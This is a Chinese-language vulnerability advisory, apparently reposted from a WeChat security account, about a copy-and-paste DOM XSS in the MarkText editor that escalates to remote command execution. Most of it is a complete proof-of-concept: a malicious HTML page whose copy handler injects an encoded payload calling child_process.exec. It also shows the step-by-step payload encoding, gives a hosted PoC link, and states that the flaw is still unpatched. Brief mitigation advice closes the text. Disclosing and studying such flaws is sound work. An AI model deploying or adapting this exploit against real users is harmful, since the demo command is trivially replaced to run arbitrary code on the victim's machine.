MarkText存在远程命令执行漏洞
漏洞概述:
MarkText 存在DOM XSS漏洞,允许任意 JavaScript 代码在 MarkText 主窗口的上下文中运行。如果用户从恶意网页复制文本并将其粘贴到 MarkText 中,则可以利用此漏洞。
漏洞详情:
当用户执行粘贴操作时,MarkText会检查剪贴板数据并尝试将HTML标签转换为等效的Markdown格式,然后再次生成HTML以进行Markdown预览。
具体来说,当用户从网页复制链接并将其粘贴到 MarkText 中时,标签将由src/muya/lib/contentState/pasteCtrl.js<a>中的以下代码处理:
constlinks =Array.from(tempWrapper.querySelectorAll('a'))for(constlinkoflinks) {consthref = link.getAttribute('href')consttext = link.textContent// [1]if(URL_REG.test(href) && href === text) {consttitle =awaitgetPageTitle(href)if(title) {link.innerHTML = sanitize(title, PREVIEW_DOMPURIFY_CONFIG,true)}else{constspan =document.createElement('span')// [2]span.innerHTML = text// [3]link.replaceWith(span)}}}
此代码迭代所有标签<a>。对于每个标签,如果其href属性与其 相同textContent,MarkText 将尝试获取 URL 并从响应中提取标题,然后在清理后分配给innerHTML。
但是,如果找不到标题,MarkText 将创建一个<span>元素 at[2]并将textContent原始<a>标签分配给innerHTMLat [3],而不进行任何清理,这会导致基于 DOM 的 XSS。
这应该会影响所有平台,因为 MarkText 是基于 Electron 构建的。测试于:
- 适用于 Windows 的 MarkText 0.17.1
- 适用于 Linux 的 MarkText 0.17.1
漏洞POC
攻击者可以制作恶意网页并使用以下代码来触发该事件:
<script>document.addEventListener('copy',e=>{e.preventDefault();letpayload ='';if(navigator.platform ==='Win32') {payload =decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW01dmRHVndZV1FnUXpwY1hIZHBibVJ2ZDNOY1hIZHBiaTVwYm1raUtRJTNEJTNEJykpJTI2JTIzeDNlJTNCJTIyJTNFaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW01dmRHVndZV1FnUXpwY1hIZHBibVJ2ZDNOY1hIZHBiaTVwYm1raUtRJTNEJTNEJykpJTI2JTIzeDNlJTNCJTNDJTJGYSUzRSk='));}else{payload =decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW1kdWIyMWxMV05oYkdOMWJHRjBiM0lnTFdVZ0owMWhjbXRVWlhoMElGSkRSU0JRYjBNbklpayUzRCcpKSUyNiUyM3gzZSUzQiUyMiUzRWh0dHAlM0ElMkYlMkYxJTNBMSUyRiUyMyUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gzZSUzQiUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gyMCUzQm9ubG9hZCUzRGV2YWwoYXRvYignY21WeGRXbHlaU2dpWTJocGJHUmZjSEp2WTJWemN5SXBMbVY0WldNb0ltZHViMjFsTFdOaGJHTjFiR0YwYjNJZ0xXVWdKMDFoY210VVpYaDBJRkpEUlNCUWIwTW5JaWslM0QnKSklMjYlMjN4M2UlM0IlM0MlMkZhJTNFKQ=='))}e.clipboardData.setData('text/html', payload +window.getSelection());})</script>
PoC中的base64编码部分被解码为以下内容:
require("child_process").exec("gnome-calculator -e 'MarkText RCE PoC'")完整代码
<html><head><style>.markdown-body{box-sizing: border-box;min-width:200px;max-width:980px;margin:0auto;padding:45px;}@media(max-width:767px) {.markdown-body{padding:15px;}}</style><linkrel="stylesheet"href="//cdnjs.cloudflare.com/ajax/libs/github-markdown-css/5.2.0/github-markdown.min.css"></head><body><divclass="markdown-body"><h1>MarkText Copy-and-Paste RCE PoC</h1><h3>Copy anything from this page and paste it into your MarkText :)</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Diam vulputate ut pharetra sit amet aliquam. Sapien faucibus et molestie ac feugiat sed lectus. Imperdiet massa tincidunt nunc pulvinar sapien et ligula ullamcorper malesuada. Bibendum arcu vitae elementum curabitur vitae nunc sed. Tincidunt nunc pulvinar sapien et ligula ullamcorper. Sagittis aliquam malesuada bibendum arcu vitae. Sagittis vitae et leo duis ut. Amet nulla facilisi morbi tempus iaculis urna id volutpat. Rhoncus dolor purus non enim praesent elementum facilisis leo. Iaculis eu non diam phasellus vestibulum lorem sed. Adipiscing enim eu turpis egestas pretium aenean pharetra. Cursus mattis molestie a iaculis at. Enim neque volutpat ac tincidunt vitae semper quis. Pellentesque eu tincidunt tortor aliquam. Arcu dictum varius duis at consectetur lorem donec massa sapien. Sodales neque sodales ut etiam sit amet. Lacus sed turpis tincidunt id. Vitae proin sagittis nisl rhoncus mattis rhoncus urna. Faucibus et molestie ac feugiat.</p><p>Fames ac turpis egestas maecenas pharetra convallis posuere morbi leo. Faucibus vitae aliquet nec ullamcorper sit amet risus nullam eget. Odio euismod lacinia at quis risus sed vulputate odio. Pulvinar etiam non quam lacus suspendisse. In cursus turpis massa tincidunt dui ut ornare. Nunc vel risus commodo viverra maecenas. Metus aliquam eleifend mi in nulla posuere sollicitudin aliquam. Elementum pulvinar etiam non quam. Pellentesque nec nam aliquam sem et tortor consequat id porta. Integer feugiat scelerisque varius morbi enim nunc faucibus. Pellentesque dignissim enim sit amet venenatis.</p><p>Gravida neque convallis a cras semper auctor neque. Dictum at tempor commodo ullamcorper a lacus vestibulum. Eu turpis egestas pretium aenean pharetra. Euismod elementum nisi quis eleifend. Vitae proin sagittis nisl rhoncus mattis rhoncus urna neque viverra. Volutpat consequat mauris nunc congue nisi. Risus quis varius quam quisque id diam vel quam. Dictum non consectetur a erat. Faucibus purus in massa tempor nec feugiat. Quam elementum pulvinar etiam non quam lacus suspendisse faucibus interdum. In egestas erat imperdiet sed euismod nisi porta. Id faucibus nisl tincidunt eget.</p><p>Vulputate sapien nec sagittis aliquam malesuada bibendum arcu vitae elementum. Aliquam eleifend mi in nulla posuere. Cursus sit amet dictum sit amet justo donec. Vitae et leo duis ut diam quam nulla porttitor massa. Eu consequat ac felis donec et odio pellentesque diam. Amet nisl purus in mollis. Vitae purus faucibus ornare suspendisse sed. Tincidunt tortor aliquam nulla facilisi cras fermentum odio. Massa eget egestas purus viverra accumsan. Pellentesque dignissim enim sit amet venenatis urna cursus. Eget magna fermentum iaculis eu.</p><p>Ornare massa eget egestas purus viverra accumsan. Orci porta non pulvinar neque laoreet suspendisse interdum consectetur libero. Morbi tristique senectus et netus et malesuada. Aliquet risus feugiat in ante. Risus pretium quam vulputate dignissim suspendisse. Vestibulum lectus mauris ultrices eros in cursus turpis massa tincidunt. Vel elit scelerisque mauris pellentesque pulvinar pellentesque. Auctor eu augue ut lectus arcu bibendum at. Aliquet risus feugiat in ante metus dictum at tempor commodo. Integer feugiat scelerisque varius morbi enim nunc faucibus a pellentesque. Venenatis tellus in metus vulputate eu. Eget est lorem ipsum dolor sit amet. Congue eu consequat ac felis donec et odio pellentesque. Pellentesque sit amet porttitor eget. Dictum non consectetur a erat. Justo laoreet sit amet cursus sit amet dictum sit amet. Magna fermentum iaculis eu non diam.</p><p>Donec ultrices tincidunt arcu non sodales. Et magnis dis parturient montes nascetur ridiculus. Eros in cursus turpis massa tincidunt. Leo vel fringilla est ullamcorper eget nulla facilisi etiam dignissim. Sodales neque sodales ut etiam sit amet nisl purus. Molestie at elementum eu facilisis sed odio. Viverra orci sagittis eu volutpat odio facilisis mauris sit amet. Consequat id porta nibh venenatis cras sed felis. Tellus elementum sagittis vitae et leo duis ut. Maecenas ultricies mi eget mauris pharetra et. Mi sit amet mauris commodo quis imperdiet. Gravida quis blandit turpis cursus in. Enim nec dui nunc mattis enim ut tellus elementum. Eu augue ut lectus arcu bibendum at. A cras semper auctor neque vitae tempus. Duis at tellus at urna. At lectus urna duis convallis convallis tellus id interdum. Enim facilisis gravida neque convallis a cras semper auctor neque. Sed adipiscing diam donec adipiscing tristique risus nec feugiat in.</p><p>Volutpat lacus laoreet non curabitur gravida arcu ac. Diam quis enim lobortis scelerisque fermentum dui faucibus. Tristique nulla aliquet enim tortor at auctor urna nunc id. Sit amet facilisis magna etiam. Proin gravida hendrerit lectus a. Fames ac turpis egestas maecenas. Ut eu sem integer vitae. Nunc aliquet bibendum enim facilisis gravida neque convallis a. Vulputate sapien nec sagittis aliquam. Egestas integer eget aliquet nibh. Rutrum quisque non tellus orci ac auctor augue. Sed blandit libero volutpat sed cras. Suspendisse potenti nullam ac tortor vitae purus faucibus ornare suspendisse. Dolor sed viverra ipsum nunc aliquet bibendum enim facilisis. Nullam eget felis eget nunc lobortis.</p></div><script>document.addEventListener('copy',e=>{e.preventDefault();// p = btoa(`require("child_process").exec("gnome-calculator -e 'MarkText RCE PoC'")`);// btoa(encodeURIComponent(`[](<a href="http://1:1/#<svg><svg onload=eval(atob('${p}'))>">http://1:1/#<svg><svg onload=eval(atob('${p}'))></a>)`))letpayload ='';if(navigator.platform ==='Win32') {payload =decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW01dmRHVndZV1FnUXpwY1hIZHBibVJ2ZDNOY1hIZHBiaTVwYm1raUtRJTNEJTNEJykpJTI2JTIzeDNlJTNCJTIyJTNFaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW01dmRHVndZV1FnUXpwY1hIZHBibVJ2ZDNOY1hIZHBiaTVwYm1raUtRJTNEJTNEJykpJTI2JTIzeDNlJTNCJTNDJTJGYSUzRSk='));}else{payload =decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW1kdWIyMWxMV05oYkdOMWJHRjBiM0lnTFdVZ0owMWhjbXRVWlhoMElGSkRSU0JRYjBNbklpayUzRCcpKSUyNiUyM3gzZSUzQiUyMiUzRWh0dHAlM0ElMkYlMkYxJTNBMSUyRiUyMyUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gzZSUzQiUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gyMCUzQm9ubG9hZCUzRGV2YWwoYXRvYignY21WeGRXbHlaU2dpWTJocGJHUmZjSEp2WTJWemN5SXBMbVY0WldNb0ltZHViMjFsTFdOaGJHTjFiR0YwYjNJZ0xXVWdKMDFoY210VVpYaDBJRkpEUlNCUWIwTW5JaWslM0QnKSklMjYlMjN4M2UlM0IlM0MlMkZhJTNFKQ=='))}e.clipboardData.setData('text/html', payload +window.getSelection());})</script></body></html>
当受害者从该页面复制文本时,有效负载会添加到复制的内容中,并在粘贴到 MarkText 时触发。该 PoC 将在 Windows 或gnome-calculatorLinux 上运行系统命令。
以下是在 Windows 和 Ubuntu 上演示 PoC 的 GIF:
POC在线地址
https://o.cal1.cn/c3a8d0cbeea8f9ab-marktext-poc/rce.html构造POC过程
原始POC
require("child_process").exec("calc")base64编码
cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNhbGMiKQ==url编码
%5B%E2%80%AA%5D(%3Ca%20href%3D%22http%3A%2F%2F1%3A1%2F%23%26%23x3c%3Bsvg%26%23x3e%3B%26%23x3c%3Bsvg%26%23x20%3Bonload%3Deval(atob('cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNhbGMiKQ%3D%3D'))%26%23x3e%3B%22%3Ehttp%3A%2F%2F1%3A1%2F%23%26%23x3c%3Bsvg%26%23x3e%3B%26%23x3c%3Bsvg%26%23x20%3Bonload%3Deval(atob('cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNhbGMiKQ%3D%3D'))%26%23x3e%3B%3C%2Fa%3E)base64编码
JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW1OaGJHTWlLUSUzRCUzRCcpKSUyNiUyM3gzZSUzQiUyMiUzRWh0dHAlM0ElMkYlMkYxJTNBMSUyRiUyMyUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gzZSUzQiUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gyMCUzQm9ubG9hZCUzRGV2YWwoYXRvYignY21WeGRXbHlaU2dpWTJocGJHUmZjSEp2WTJWemN5SXBMbVY0WldNb0ltTmhiR01pS1ElM0QlM0QnKSklMjYlMjN4M2UlM0IlM0MlMkZhJTNFKQ==最终POC
<script>document.addEventListener('copy',e=>{e.preventDefault();// p = btoa(`require("child_process").exec("gnome-calculator -e 'MarkText RCE PoC'")`);// btoa(encodeURIComponent(`[](<a href="http://1:1/#<svg><svg onload=eval(atob('${p}'))>">http://1:1/#<svg><svg onload=eval(atob('${p}'))></a>)`))letpayload ='';if(navigator.platform ==='Win32') {payload =decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW1OaGJHTWlLUSUzRCUzRCcpKSUyNiUyM3gzZSUzQiUyMiUzRWh0dHAlM0ElMkYlMkYxJTNBMSUyRiUyMyUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gzZSUzQiUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gyMCUzQm9ubG9hZCUzRGV2YWwoYXRvYignY21WeGRXbHlaU2dpWTJocGJHUmZjSEp2WTJWemN5SXBMbVY0WldNb0ltTmhiR01pS1ElM0QlM0QnKSklMjYlMjN4M2UlM0IlM0MlMkZhJTNFKQ=='));}else{payload =decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW1kdWIyMWxMV05oYkdOMWJHRjBiM0lnTFdVZ0owMWhjbXRVWlhoMElGSkRSU0JRYjBNbklpayUzRCcpKSUyNiUyM3gzZSUzQiUyMiUzRWh0dHAlM0ElMkYlMkYxJTNBMSUyRiUyMyUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gzZSUzQiUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gyMCUzQm9ubG9hZCUzRGV2YWwoYXRvYignY21WeGRXbHlaU2dpWTJocGJHUmZjSEp2WTJWemN5SXBMbVY0WldNb0ltZHViMjFsTFdOaGJHTjFiR0YwYjNJZ0xXVWdKMDFoY210VVpYaDBJRkpEUlNCUWIwTW5JaWslM0QnKSklMjYlMjN4M2UlM0IlM0MlMkZhJTNFKQ=='))}e.clipboardData.setData('text/html', payload +window.getSelection());})</script>
执行效果
0day
经测试,目前官网最新版仍存在此漏洞。
漏洞缓解措施:
建议在将不受信任的数据分配给 之前对其进行清理innerHTML。
对于使用受此漏洞影响的版本的最终用户,建议避免从不受信任的网页复制文本然后将其粘贴到 MarkText 中。
阅读 10万+
原文始发于微信公众号(利刃信安攻防实验室):【漏洞预警】MarkText存在远程命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论